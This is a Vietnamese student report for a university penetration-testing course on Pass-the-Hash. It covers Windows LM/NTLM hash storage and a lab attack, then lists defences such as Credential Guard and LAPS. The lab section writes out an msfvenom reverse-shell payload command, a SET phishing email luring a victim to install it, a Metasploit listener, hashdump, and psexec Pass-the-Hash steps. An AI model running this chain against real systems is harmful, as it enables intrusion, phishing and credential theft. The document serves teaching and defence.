HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CÔNG NGHỆ THONG TIN - BÁO CÁO CUỐI KÌ KIỂM THỬ XÂM NHẬP Đề tài : Pass The Hash   Giảng Viên hướng dẫn: Ths.Phan Nghĩa Hiệp Nhóm sinh viên thực hiện: Nhóm 11   Lớp: Nguyễn Minh Thuận N19DCAT086 Nguyễn Nhật Thái N19DCAT077 Nguyễn Đăng Mạnh N19DCAT049 Võ Văn Tuấn N19DCAT076 Võ Quốc Trí N19DCAT092 D19CQAT01-N   Hồ Chí Minh, 2023   NHẬN XÉT CỦA GVHD   LỜI CẢM ƠN Lời đầu tiên, nhóm em xin chân thành cảm ơn thầy Phan Nghĩa Hiệp –  giảng viên môn “ KIỂM THỬ XÂM NHẬP ” đã bảo tận tình giúp đỡ chúng em suốt trình làm đồ án mơn học Với hướng dẫn thầy, nhóm em có định hướng tốt việc triển khai thực yêu cầu làm tập lớn môn học Tuy nhiên, tìm hiểu với kiến thức cịn chưa sâu sắc nên khơng tránh khỏi nhiều thiếu sót Mong thầytạo điều kiện có lời góp để nhóm em hồn thành đồ án cách hoàn thiện Một lần nữa, nhóm em xin chân thành cảm ơn chúc thầy thật nhiều sức khỏe, thành công công việc TPHCM, ngày 09 tháng 04 năm 2023  Nhóm sinh viên thực Nguyễn Minh Thuận Nguyễn Nhật Thái Nguyễn Đăng Mạnh Võ Văn Tuấn Võ Quốc Trí   MỤC LỤC CHƯƠNG CƠ SỞ LÝ THUYẾT 1.1 Cơ Password Hashing 1.2 Lưu trữ mật Windows 1.2.1 LM Hash 1.2.2 NTLM Hash 1.2.3 Cached Credentials .10 1.2.4 Memory 10 1.2.5 Reversibly Encrypted 11 1.3 Sử dụng mật 11 1.3.1 LM NTLM .11 1.3.2 NTLMv2 .12 1.3.3 Kerberos .12 1.4 Tấn công mật 13 1.4.1 Tấn công mật Online 13 1.4.2 Tấn công mật Offline 14 CHƯƠNG TẤN CÔNG VÀ NGĂN CHẶN PASS-THE-HASH 15 2.1 Giới thiệu 15 2.2 Phương pháp công 16 2.2.1 Trích xuất NTLM hash .17 2.2.2 Sử dụng NTLM hash 19 2.3 Thiết lập thử ngiệm công 21 2.3.1 Lấy Hashes 22 2.3.2 Passs the Hash 28 2.4 Phịng ngừa cơng Pass-the-Hash .30 CHƯƠNG TỔNG KẾT 34   DANH MỤC HÌNH ẢNH  Hình 1: Mật biến đổi thành LM Hash .9  Hình 2: Mật chuyển thành NTLM Hash 10  Hình 3: Sử dụng Hydra để đốn username password SSH 13  Hình 1:Cách hoạt động Pass-the-Hash 16   Hình 2: Sử dụng hashdump để kết xuất băm mật 17   Hình 3: Trích xuất hàm băm NTLM lưu trữ SAM 17   Hình 4: Trích xuất hàm băm NTLM từ LSASS 18  Hình 5: Trích xuất hàm băm tài khoản domain 19  Hình 6: PtH over Kerberos .20  Hình 7: PtH over WMI 20  Hình 8: PtH over SMB 21  Hình 9: PtH sử dụng Psexec Metasploit 21  Hình 10: Khởi động máy công 22  Hình 11: Tạo tệp độc hại 22  Hình 12: Khởi động Webserver .23  Hình 13: Khởi động tool SET 23  Hình 14: Tấn công Social Engineering 24  Hình 15: Tấn cơng Mass Mailer 24  Hình 16: Hình thức gửi thư .25  Hình 17: Gửi mail kèm link tải ứng dụng chứa mã độc 25  Hình 18: Tạo mơi trường để lắng nghe 26   Hình 19: Nạn nhân nhận mail cảnh báo giả mạo 27   Hình 20: Cài đặt ứng dụng chứa mã độc 27   Hình 21: Phiên metepreter mở .28  Hình 22: Lấy hàm băm mật 28  Hình 23: Khởi chạy Metasploit với module psexec 29  Hình 24: Pass-the-Hash sử dụng psexec 29  Hình 25:Bật Windows Defender Credential Guard 32   LỜI MỞ ĐẦU  Người dùng Internet ngày quan tâm đến bảo mật họ Mọi người thường tập trung thời gian vào việc đảm bảo cho sách mật cho tỉ mỉ đủ phức tạp để chúng khơng bị crack cá nhân với mục đích xấu Khơng thiếu lý tội phạm mạng tìm hội để lấy thơng tin đăng nhập người dùng biến họ thành nạn nhân Thực tế là, mật hệ thống Windows bị crack khác dễ dàng, chí khơng cần phải crack mật họ mà có quyền truy nhập vào hệ thống thể sử dụng username mật họ Việc thực cách đơn giản với kỹ thuật có tên gọi Pass the Hash Trong báo cáo này, nhóm em xem xét cách thức hoạt động kỹ thuật này, minh họa trình cách sử dụng giá trị hash mật lấy sử dụng chúng thành cơng để có quyền truy nhập hệ thống mà khơng cần crack để có nội dung che giấu Và bên cạnh việc giới thiệu ký thuật cơng, nhóm em giới thiệu số kỹ thuật phát phòng chống công   CHƯƠNG CƠ SỞ LÝ THUYẾT 1.1 Cơ Password Hashing Băm mật cách tiếp cận phổ biến việc giải vấn đề bảo mật mật Hàm băm hàm chiều cho phép ta thực biến đổi mật ban đầu thành chuỗi thể cho khơng thể giải mã ngược Mỗi giá trị băm tương ứng với mật Chúng ta lưu vào sở liệu giá trị kết hàm băm Khi thực xác thực người dùng, hệ thống thực mã hóa đầu vào người dùng, so sánh với sở  liệu để kiểm tra đưa kết 1.2 Lưu trữ mật Windows Mật lưu trữ văn gốc mã hóa đảo ngược đơi lưu trữ dạng băm Hàm băm thiết kế để nhận đầu vào chuyển đổi thành đầu khơng thể đảo ngược Trong phần này, nhóm em giới thiệu ngắn gọn năm cách mà Windows hệ điều hành dùng để lưu trữ mật để xác thực người dùng 1.2.1 LM Hash Trong phiên trước Windows, hàm băm LM thường lưu trữ truyền mặc định Tuy nhiên, Windows Vista phiên ở  trên, hàm băm LM khơng lưu trữ mặc định, khơng sử dụng theo mặc định trình xác thực mạng Thay vào đó, phiên sử dụng hàm băm NTLMv2 làm  phương thức xác thực mặc định Quá trình tạo hàm băm LM tương đối phức tạp Hash mật loại tính trình bước: Mật người dùng chuyển đổi thành tất ký tự in hoa   Mật bổ sung thêm ký tự vào có đủ 14 ký tự Mật chia thành hai hash có ký tự Các giá trị sử dụng đẻ tạo hai khóa mã hóa DES, thêm vào bit chẵn lẻ để tạo khóa 64 bit Mỗi khóa DES sử dụng để mã hóa chuỗi ASCII định sẵn (KGS!@#$%), cho kết hai chuỗi văn mật byte Hai chuỗi văn mật byte kết hợp đẻ tạo thành giá trị 16 byte, giá trị hash LM hoàn chỉnh Trong thực tế, mật “PassWord123” chuyển đổi sau: PASSWORD123 PASSWORD123000 PASSWOR and D123000 PASSWOR1 and D1230001 E52CAC67419A922 and 664345140A852F61 E52CAC67419A922664345140A852F61    Hình 1: Mật biến đổi thành LM Hash 1.2.2 NTLM Hash  NT LAN Manager (NTLM) giao thức thẩm định Microsoft, giao thức này, tạo để kế vị LM Có nhiều cải tiến, NTLM chấp nhận phương thức thẩm định đáng để lựa chọn thực thi Window Quá trình tạo NTLM hash trinh đơn giản nhiều so với mà hệ điều hành thực hiện, dựa vào thuật tốn MD4 để tạo hash   nhờ loạt tính tốn tốn học Thuật toán MD4 sử dụng ba lần để tạo NT hash Trong thực tế, mật “Password123” có kết “94354877D5B87105D7FEC0F3BF500B33” sau sử dụng thuật toán MD4  Hình 2: Mật chuyển thành NTLM Hash 1.2.3 Cached Credentials Thông tin đăng nhập lưu nhớ cache thuật ngữ sử dụng để mơ tả q trình lưu trữ tên miền thơng tin đăng nhập người dùng đăng nhập cục vào thành viên miền mà khơng kết nối với  bộ điều khiển miền (ví dụ: miền không khả dụng) 1.2.4 Memory Windows lưu trữ hàm băm mật người dùng (băm NT hàm  băm LM) vị trí nhớ người dùng đăng nhập tương tác thơng qua dịch vụ đầu cuối Vị trí truy cập hệ điều hành quy trình đóng vai trị hệ điều hành     Mục tiêu: Thực công Pass the Hash 2.3.1 Lấy Hashes    Khai thác mục tiêu sử dụng reverse_tcp Khởi động máy Kali Linux  Hình 10: Khởi động máy cơng  Thực thi câu lệnh tạo tệp độc hại phát tán tệp đến mục tiêu: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.35  LPORT=4445 -f exe > /var/www/html/mal.exe Trong đó: -p: cho phép chọn payload tham số payload -f: chọn dạng file cho malware LHOST: IP máy công LPORT: port dùng để lắng nghe  Hình 11: Tạo tệp độc hại   Khởi động Web Server   Hình 12: Khởi động Webserver  Khởi động Social Engineering Tools (SET) để phishing mail  Hình 13: Khởi động tool SET    Tại giao diện SET, nhập để sử dụng cơng Social-Engineering  Hình 14: Tấn cơng Social Engineering  Sau đó, nhâp để sử dụng hình cơng giả mạo mail  Hình 15: Tấn công Mass Mailer    Tiếp theo, chọn để gửi thư cho người để gửi thư hàng loạt  Hình 16: Hình thức gửi thư  Thiết lập chèn link download chứa mã độc chỉnh sửa nội dung mail cho giống thật để gửi cho nạn nhân  Hình 17: Gửi mail kèm link tải ứng dụng chứa mã độc Tạo môi trường để lắng nghe sau nạn nhân thực thi mã độc: msfconsole use multi/handler   set PAYLOAD windows/meterpreter/reverse_tcp  set LHOST  set LPORT   exploit   Hình 18: Tạo mơi trường để lắng nghe Khi nạn nhận nhận mail, với tâm lý lo sợ click vào link tải xuống ứng dụng độc hại    Hình 19: Nạn nhân nhận mail cảnh báo giả mạo  Nạn nhân cài đặt ứng dụng, đồng thời kích hoạt mã độc  Hình 20: Cài đặt ứng dụng chứa mã độc    Ngay lập tức, bên phía kẻ cơng nhận phiên metepreter, từ làm thứ phiên  Hình 21: Phiên metepreter mở  Lấy hàm băm mật sử dụng hashdump  Hình 22: Lấy hàm băm mật Trong đó: 1: username 2: userID 3: LM hash 4: NTLM hash 2.3.2 Passs the Hash Sau lừa nạn nhân chạy phần mềm độc hại lấy số giá trị băm từ máy Băm hoạt động máy khác cơng ty Trong trường hợp này, nhóm em công mục tiêu    Sử dụng Module Psexec Metasploit Khởi chạy Metasploit sử dụng module psexec  Hình 23: Khởi chạy Metasploit với module psexec Thiết lập cấu hình cho module psexec pass the hash:  set RHOST  set SMBUser  set SMBPass exploit   Hình 24: Pass-the-Hash sử dụng psexec   Sau exploit, phiên metepreter mở ra, công thành công thông qua hàm băm mật mà khơng cần bẻ khóa chúng 2.4 Phịng ngừa cơng Pass-the-Hash Bảo vệ chống lại cơng Pass-the-Hash khó khăn nhiều lý Một tùy chọn đơn giản loại bỏ xác thực NTLM  Điểm yếu xác thực NTLM biết rõ không bị giới hạn việc vượt qua công băm Kết Windows 2000, Microsoft thay NTLM làm giao thức xác thực mặc định giao thức mạnh nhiều có tên Kerberos Tuy nhiên, nhiều ứng dụng công ty yêu cầu xác thực  NTLMv1 NTLMv2, tổ chức thường khơng thể vơ hiệu hóa giao thức cách đơn giản Hơn nữa, NTLM bị loại bỏ, Kerberos dễ bị công tương tự có tên Pass-the-Ticket, kẻ cơng sử dụng Kerberos Ticket bị đánh cắp để xác thực mà không cần biết mật người dùng Tuy nhiên, có phương án giúp bảo vệ tổ chức trước công Pass-the-Hash Chúng bao gồm phương án sau: - Ngăn chặn kẻ cơng khơng có chỗ xâm nhập để khởi động công pass-the-hash: Để thực công  pass-the-hash, kẻ thù phải giành chỗ đứng mạng bạn Do đó, thứ bạn làm để ngăn chặn chúng lợi Các phương pháp hay bao gồm sử dụng công cụ kiểm tra hoạt động đăng nhập cảnh báo bạn lần đăng nhập không thành công nỗ lực khác xảy để xâm nhập mạng bạn - Sử dụng tường lửa nơi Yêu cầu tất máy, bao gồm máy chủ máy trạm, phải bật tường lửa, khơng có ngoại lệ Điều loại bỏ mạng ngang hàng nhảy từ máy chủ sang máy chủ khác   - Kiểm tra lưu lượng thiết bị đầu cuối Bằng cách giám sát điểm cuối bạn để thiết lập lưu lượng truy cập,  bạn thấy cơng băm thực máy chủ bị xâm  phạm Các giải pháp bên thứ ba tự động giám sát nỗ lực xác thực máy trạm cảnh báo bạn công xảy - Bảo vệ Tiger  Nội dụng Tiger bao gồm điều khiển miền, máy chủ dự phịng máy chủ khác có tài khoản đặc quyền cao chạy nhớ, chẳng hạn tài khoản dịch vụ yêu cầu tư cách thành viên Quản trị viên miền Để giữ cho tài khoản không bị kẻ thù xâm phạm vượt qua công băm, đảm bảo đặt tài sản vào mạng bảo vệ, sử dụng tường lửa để quản lý lưu lượng cho phép máy chủ giao tiếp với máy chủ dịch vụ khác mà chúng cần để chạy cách - Bật bảo vệ thông tin xác thực Bộ bảo vệ thông tin xác thực Windows tính bảo mật mà hệ thống Windows 10 trở lên có Nhờ mà bảo vệ thơng tin  bí mật lưu trữ hệ thống Local Security Authority Subsystem Service (LSASS) thực thi sách bảo mật hệ thống Windows Chúng ta kích hoạt tính thông qua Group Policy Trong bảng điều khiển Local Group Policy Editer, chọn Computer  Configuations, chọn Aministrator, chọn System, chọn Device Guard Chọn Turn On Virtualization Based Security, sau chọn tùy chọn Enabled Trong hộp Select platform security level, chọn Secure Boot DMA Protection Secure Boot   Trong hộp Credential Guard Configuation, chọn Enabled with UEFI lock  Chọn Apply OK   Hình 25:Bật Windows Defender Credential Guard  - Sử dụng managed service accounts (MSAs) Băm mật tài khoản dịch vụ sử dụng công PtH Một cách hay để giảm rủi ro sử dụng standalone managed service accounts (sMSA) group managed service accounts (gMSA) MSA cung cấp tính quản lý mật tự động để đảm bảo mật tài khoản dịch vụ (và giá trị băm chúng) thay đổi thường xuyên gMSA bị hạn chế sử dụng tương tác Do đó, chúng làm cho công băm vượt qua trở nên hữu ích - Sử dụng Microsoft LAPS Local Administrator Password Solution (LAPS) Microsoft hỗ trợ nhiều cho trò chơi bảo mật bạn Các tổ chức thường đặt mật cho quyền truy cập quản trị cục tất điểm cuối để đơn giản Đó rủi ro bảo mật lớn kẻ thù đánh cắp hàm băm quản trị viên cục   máy sử dụng để cơng hàm băm máy khác LAPS giúp việc quản lý mật hàng trăm hàng nghìn thiết  bị bạn trở nên dễ dàng hơn, thật tiện lợi sử dụng mật quản trị viên cục máy - Cập nhập hệ điều hành Cập nhập hệ điều hành ý tưởng hay sửa lỗi bảo mật  bị tội phạm mạng khai thác - Khởi động lại máy tính sau đăng xuất Lý để thực tác vụ hệ thống lưu trữ mật băm nhớ Nếu khởi động lại máy tính sau đóng phiên, hàm băm bị xóa khỏi nhớ hệ thống Vì lý này, thay đăng xuất để máy tính bật, bạn nên khởi động lại tắt hồn tồn máy để xóa hàm băm khỏi nhớ giảm thiểu đáng kể công Mặt khác, nên sử dụng công cụ tự động, chẳng hạn phần mềm chống phần mềm độc hại Lý chúng hữu ích để phịng thủ trước địn cơng Pass the Hash kiểu công khác Những cơng cụ có khả phát tệp bị nhiễm có hại máy tính sau vơ hiệu hóa chúng trước chúng cơng Cuối cùng, mã hóa hồn tồn ổ cứng để ngăn chúng truy cập nội dung ổ đĩa hàm  băm NTLM lưu trữ đó, hai tùy chọn sử dụng Bitlocker, vốn có sẵn cho Windows sử dụng VeraCrypt, giải pháp hồn tồn miễn phí   CHƯƠNG TỔNG KẾT  Như trình bày phần trước, pass-the-hash cơng nghiêm trọng, đặc biệt có sẵn cơng cụ miễn phí tạo điều kiện thuận lợi cho cơng Nếu kẻ cơng có giá trị băm, họ sử dụng chúng trực tiếp mà không cần tốn thời gian cho công mật công trực tuyến Tuy nhiên, nên nhớ điều yêu cầu kẻ cơng phải có quyền quản trị hệ thống bị xâm nhập Các tổ chức nên thực bước nghiêm túc, bước khó khăn để giảm khả thành công công Domain Controller hệ thống nhạy cảm khác nên truy cập từ hệ thống đáng tin cậy khơng có quyền truy cập internet Nên tránh khả tương thích ngược hàm băm yếu LM Xác thực hai yếu tố sử dụng mã thơng báo khuyến khích để giảm thiểu công Cần nhấn mạnh khái niệm quyền truy cập người dùng Giám sát chặt chẽ máy chủ lưu lượng truy cập mạng tổ chức quan trọng để  phát hoạt động lạ Bảo mật q trình liên tục, đó, phải liên tục đánh giá khả bảo mật tổ chức, triển khai giải pháp cho vấn đề bảo mật, giám sát giải pháp đó, giáo dục quản trị viên người dùng bắt đầu lại chu kỳ Khơng có hai cố giống nhau, nên học hỏi từ cố tích lũy kiến thức   TÀI LIỆU THAM KHẢO [1] Hồng Sơn (2023), Tìm hiểu kỹ thuật pass the hash, Trung tâm an tồn thơng tin [2] Jason Morano (2022), Pass the Hash (PtH) attacks: How does they work   – and how to defend against them, Blog Active Directory/Security [3] Ellyx13 (2021), Hack Password Windows cách trích xuất liệu từ RAM với Mimikatz, Basic Hacking [4] Georgia Weiman (2014), Chapter – Password Attacks, Penetration Testing [5] NetMux LLC (2020), Extract Hashes, Hash Crack – Password Cracking Manual   PHÂN CÔNG NHIỆM VỤ ST T Họ tên MSSS Nhiệm vụ Nguyễn Minh  N19DCAT086 Thiết lập thử nghiệm Thuận cơng Pass-theHash Nguyễn Nhật  N19DCAT077 Tìm hiểu phương Thái  pháp cơng Passthe-Hash Nguyễn Đăng  N19DCAT049 Tìm hiểu cách sử Mạnh dụng Mật công Mật Võ Văn Tuấn N19DCAT076 Tìm hiểu biện  pháp phịng ngừa, ngăn chặn cơng Pass-the-Hash Võ Quốc Trí N19DCAT092 Tìm hiểu Password Hacking Lưu trữ mật Windows Thời gian hoàn thành 01/04/2023 30/03/2023 28/03/2023 29/03/2023 26/03/2023